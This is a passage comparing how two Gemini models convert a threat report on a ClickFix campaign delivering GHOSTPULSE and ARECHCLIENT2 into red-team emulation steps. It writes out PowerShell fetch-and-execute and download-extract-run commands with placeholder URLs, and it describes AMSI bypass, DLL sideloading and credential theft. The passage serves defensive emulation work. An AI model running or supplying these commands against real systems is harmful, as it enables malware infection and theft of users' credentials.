    • Potential Browser Information Discovery for sensitive data extraction.

By understanding and emulating these techniques, a red team can simulate similar attack scenarios for testing and improving organizational defenses.

Gemini 2.0

Model: gemini-2.0-flash


Phase: Initial Access

  • Technique: ClickFix Social Engineering
  • Procedure: The attacker tricks users into copying and pasting malicious PowerShell commands into the operating system's run dialog.

Phase: Execution

  • Technique: PowerShell Execution
  • Command: powershell -ep bypass -enc <Base64 Payload>

Phase: Payload Deployment

  • Technique: Download and Extract
  • Command: Invoke-WebRequest -Uri <URL> -OutFile $env:TEMP\ComponentStyle.zip
  • Command: Expand-Archive -Path $env:TEMP\ComponentStyle.zip -DestinationPath $env:TEMP

Phase: Execution

  • Technique: DLL Sideloading
  • Procedure: Execute a benign executable, Crysta_X64.exe, which then loads a malicious DLL, D11XDownloadManager.dll.
  • Command: & $env:TEMP\crystall\Crysta_x86.exe

Phase: AMSI Bypass

  • Technique: LoadLibraryExW Hooking & AmsiScanBuffer Hooking
  • Procedure: Hooking the LoadLibraryExW API, waiting for amsi.dll to load, and then setting a hook on AmsiScanBuffer, bypassing AMSI.

Phase: Reflective Loading

  • Technique: Reflective .NET Loading via CLRCreateInstance and CLR
  • Procedure: Loading the .NET Common Language Runtime (CLR) in memory before reflectively loading ARECHCLIENT2

Phase: Data Exfiltration & Remote Control

  • Technique: Command & Control (C2)
  • Procedure: ARECHCLIENT2 malware connects to a C2 server to receive and execute commands, granting remote control over infected systems.

Gemini 2.5

Model: gemini-2.5-flash-preview-05-20

Here's a structured breakdown of the threat actor's procedures, suitable for red team emulation, with IOCs excluded:

Phase: Initial Access

  • Technique: User Interaction / Phishing / Spearphishing Link User Execution
    • Procedure: The attacker presents a fake CAPTCHA verification page, prompting the user to "verify they are human."
    • Procedure: The user is tricked into performing a sequence of actions:
      1. Press Windows Button + R (to open the Run dialog).
      2. Press CTRL + V (to paste a malicious PowerShell command that has been copied to the clipboard by the webpage's JavaScript).
      3. Press Enter (to execute the pasted PowerShell command).

Phase: Execution

  • Technique: Command and Scripting Interpreter (PowerShell) / Malicious Link
    • Command: powershell -ep bypass -enc <Base64_Encoded_PowerShell_Command>
    • Decoded Command (First-Stage Fetcher): (Invoke-webrequest -URI 'hxxps://<shorter_url>' -UseBasicParsing).content | iex
      • Description: This command fetches and executes a subsequent PowerShell script from a remote URL.
  • Technique: Command and Scripting Interpreter (PowerShell) / Malicious File
    • Command (Second-Stage Downloader/Extractor): powershell Invoke-WebRequest -Uri "hxxps://<malicious_url>" -OutFile "$env:TEMP\ComponentStyle.zip" Expand-Archive -Path "$env:TEMP\ComponentStyle.zip" -DestinationPath "$env:TEMP" & "$env:TEMP\crystall\Crysta_x86.exe"
      • Description: This script downloads a ZIP archive, extracts its contents to the user's temporary directory, and then executes a legitimate executable that is leveraged for DLL sideloading.
  • Technique: DLL Sideloading
    • Procedure: A legitimate executable (e.g., Crysta_x86.exe) is launched, which then sideloads a malicious DLL (e.g., DivXDownloadManager.dll) located in the same directory.
  • Technique: Ingress Tool Transfer / Deobfuscation/Decoding
    • Procedure: The GHOSTPULSE loader decrypts an additional encrypted file (e.g., Shonomteak.bxi) using a DWORD addition operation with an embedded key.
  • Technique: Reflective Loading / Process Injection
    • Procedure: GHOSTPULSE extracts the next stage code from the decrypted file and injects it into a loaded library (e.g., vssapi.dll) using a library loading function.
    • Procedure: An x86 native .NET loader is reflectively loaded into memory using the CLRCreateInstance Windows API.

Phase: Defense Evasion

  • Technique: Deobfuscation/Decoding
    • Procedure: Malicious JavaScript on the phishing page is heavily obfuscated, and PowerShell commands are base64-encoded.
  • Technique: Anti-Analysis (Process Discovery)
    • Procedure: The malware checks for a predefined list of processes. If any are detected, execution is delayed by 5 seconds.
    • API Call (Internal): exec_NtDelayExecution(...)
  • Technique: Impair Defenses (AMSI Bypass)
    • Procedure: The .NET loader sets up a hook on the LoadLibraryExW API. Upon amsi.dll being loaded, it then hooks AmsiScanBuffer 0 to bypass AMSI.

Phase: Collection

  • Technique: System Information Discovery
    • Procedure: The malware gathers extensive system details, including operating system version, hardware information, local IP address, machine name, geolocation (city, country, time zone).
  • Technique: Steal Web Session Cookie
    • Procedure: ARECHCLIENT2 targets browser-saved passwords, cookies, and autofill data.
  • Technique: Credential Dumping
    • Procedure: ARECHCLIENT2 targets credentials from cryptocurrency wallets, FTP clients, VPN clients, Telegram, Discord, and Steam.

Phase: Command and Control

  • Technique: Application Layer Protocol (HTTPS/HTTP)
    • Procedure: ARECHCLIENT2 connects to its primary and secondary command-and-control (C2) servers to receive and execute commands.
    • Procedure: The C2 infrastructure appears to use a reverse proxy to protect the actual C2 server, leveraging disposable front-end redirectors.